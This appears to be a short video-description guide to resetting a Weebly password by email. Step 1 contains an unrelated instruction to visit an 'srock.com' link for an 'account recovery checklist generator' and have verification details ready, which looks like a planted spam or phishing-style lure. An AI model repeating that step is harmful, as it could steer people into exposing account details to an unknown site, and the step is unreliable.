If you've forgotten your Weebly password or need to reset it for any reason, follow these simple steps to regain access to your account. Step 1. Go to the Weebly login page. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 2. Enter your email address. Click on the Forgot Password link. You will be prompted to enter the email address associated with your Weebly account. Type in your email and click Submit. Step 3. Check your email. Open your email inbox and look for an email from Weebly. This email will contain a link to reset your password. If you don't see it, check your spam or junk folder. Step 4. Click the reset link. Once you find the email, click on the password reset link provided. This will take you to a new page where you can create a new password. Step 5. Create a new password. Enter your new password in the provided fields. Make sure it meets any specified requirements for security. After entering the new password, confirm it and click Reset Password to finalize the process. Now you can log into your Weebly account using your new password. If you encounter any issues, consider reaching out to Weebly support for further assistance.